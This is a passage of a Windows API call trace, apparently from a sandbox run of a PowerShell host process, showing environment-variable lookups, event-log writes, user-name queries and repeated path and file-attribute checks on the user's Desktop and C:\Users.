CoTaskMemFree (pv=0x1a3a10) [0079.783] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3361a90*="Certificate", lpRawData=0x3361820) returned 1 [0079.791] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0079.791] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.791] CoTaskMemFree (pv=0x1ef390) [0079.795] GetLogicalDrives () returned 0x4 [0079.796] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0079.796] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0079.797] CoTaskMemAlloc (cb=0x20e) returned 0x1ea410 [0079.797] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1ea410 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0079.797] CoTaskMemFree (pv=0x1ea410) [0079.799] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0079.799] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.799] CoTaskMemFree (pv=0x1ef390) [0079.799] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0079.799] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.799] CoTaskMemFree (pv=0x1ef390) [0079.816] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0079.816] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.816] CoTaskMemFree (pv=0x1ef390) [0079.817] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0079.817] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.817] CoTaskMemFree (pv=0x1ef390) [0079.818] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0xccb70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0079.818] SetErrorMode (uMode=0x1) returned 0x1 [0079.818] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xccdd0 | out: lpFileInformation=0xccdd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x51b277e0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x51b277e0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0079.819] SetErrorMode (uMode=0x1) returned 0x1 [0079.819] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0xccb70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0079.819] SetErrorMode (uMode=0x1) returned 0x1 [0079.819] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xccdd0 | out: lpFileInformation=0xccdd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x51b277e0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x51b277e0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0079.819] SetErrorMode (uMode=0x1) returned 0x1 [0079.819] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0079.819] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.819] CoTaskMemFree (pv=0x1ef390) [0079.824] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0xccd10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0079.824] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccb80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0079.824] SetErrorMode (uMode=0x1) returned 0x1 [0079.824] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xccd90 | out: lpFileInformation=0xccd90*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0079.824] SetErrorMode (uMode=0x1) returned 0x1 [0079.824] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccb80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0079.825] SetErrorMode (uMode=0x1) returned 0x1 [0079.825] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xccd90 | out: lpFileInformation=0xccd90*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0079.825] SetErrorMode (uMode=0x1) returned 0x1 [0079.825] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccb90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0079.825] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xcca80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0079.825] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xccb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0079.825] SetErrorMode (uMode=0x1) returned 0x1 [0079.825] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xccd90 | out: lpFileInformation=0xccd90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0079.825] SetErrorMode (uMode=0x1) returned 0x1 [0079.826] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xccb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0079.826] SetErrorMode (uMode=0x1) returned 0x1 [0079.826] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xccd90 | out: lpFileInformation=0xccd90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0079.826] SetErrorMode (uMode=0x1) returned 0x1 [0079.826] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xccb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0079.826] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0xcca80, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0079.826] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0xccb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0079.826] SetErrorMode (uMode=0x1) returned 0x1 [0079.826] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0xccd90 | out: lpFileInformation=0xccd90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0079.826] SetErrorMode (uMode=0x1) returned 0x1 [0079.826] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0xccb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0079.827] SetErrorMode (uMode=0x1) returned 0x1 [0079.827] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0xccd90 | out: lpFileInformation=0xccd90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0079.827] SetErrorMode (uMode=0x1) returned 0x1 [0079.827] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0xccb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0079.827] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\.", nBufferLength=0x105, lpBuffer=0xcca80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0079.827] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0xccb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0079.827] SetErrorMode (uMode=0x1) returned 0x1 [0079.827] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xccd90 | out: lpFileInformation=0xccd90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x51b277e0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x51b277e0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0079.827] SetErrorMode (uMode=0x1) returned 0x1 [0079.827] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0xccb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0079.827] SetErrorMode (uMode=0x1) returned 0x1 [0079.827] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xccd90 | out: lpFileInformation=0xccd90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x51b277e0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x51b277e0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0079.828] SetErrorMode (uMode=0x1) returned 0x1 [0079.828] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0xccb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0079.828] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x105, lpBuffer=0xcca80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0079.828] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xccbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0079.828] SetErrorMode (uMode=0x1) returned 0x1 [0079.828] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xccdd0 | out: lpFileInformation=0xccdd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0079.828] SetErrorMode (uMode=0x1) returned 0x1 [0079.828] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xccbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0079.828] SetErrorMode (uMode=0x1) returned 0x1 [0079.829] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xccdd0 | out: lpFileInformation=0xccdd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0079.829] SetErrorMode (uMode=0x1) returned 0x1 [0079.829] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xccbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0079.829] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0xccac0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0079.829] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0xccbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0079.829] SetErrorMode (uMode=0x1) returned 0x1 [0079.829] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0xccdd0 | out: lpFileInformation=0xccdd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0079.829] SetErrorMode (uMode=0x1) returned 0x1 [0079.829] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0xccbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0079.829] SetErrorMode (uMode=0x1) returned 0x1 [0079.829] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0xccdd0 | out: lpFileInformation=0xccdd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0079.830] SetErrorMode (uMode=0x1) returned 0x1 [0079.830] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0xccbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0079.830] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\.", nBufferLength=0x105, lpBuffer=0xccac0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0079.830] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0xccbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0079.830] SetErrorMode (uMode=0x1) returned 0x1 [0079.830] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xccdd0 | out: lpFileInformation=0xccdd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x51b277e0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x51b277e0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0079.830] SetErrorMode (uMode=0x1) returned 0x1 [0079.830] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0xccbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0079.830] SetErrorMode (uMode=0x1) returned 0x1 [0079.830] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xccdd0 | out: lpFileInformation=0xccdd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x51b277e0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x51b277e0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0079.830] SetErrorMode (uMode=0x1) returned 0x1 [0079.830] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0xccbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0079.830] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x105, lpBuffer=0xccac0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0079.832] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0xcce30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0079.832] SetErrorMode (uMode=0x1) returned 0x1 [0079.832] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xcd090 | out: lpFileInformation=0xcd090*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x51b277e0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x51b277e0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0079.833] SetErrorMode (uMode=0x1) returned 0x1 [0079.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.896] CoTaskMemAlloc (cb=0x804) returned 0x1b8f3ac0 [0079.896] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8f3ac0, nSize=0xcd3f8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd3f8) returned 0x1 [0079.896] CoTaskMemFree (pv=0x1b8f3ac0) [0079.896] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.896] GetUserNameW (in: lpBuffer=0x1a3a10, pcbBuffer=0xcd438 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd438) returned 1 [0079.897] CoTaskMemFree (pv=0x1a3a10) [0079.899] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x339f4d8*="Available", lpRawData=0x339f268) returned 1 [0079.900] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0079.900] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.900] CoTaskMemFree (pv=0x1ef390) [0079.902] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0079.902] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.902] CoTaskMemFree (pv=0x1ef390) [0079.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.911] CoTaskMemAlloc 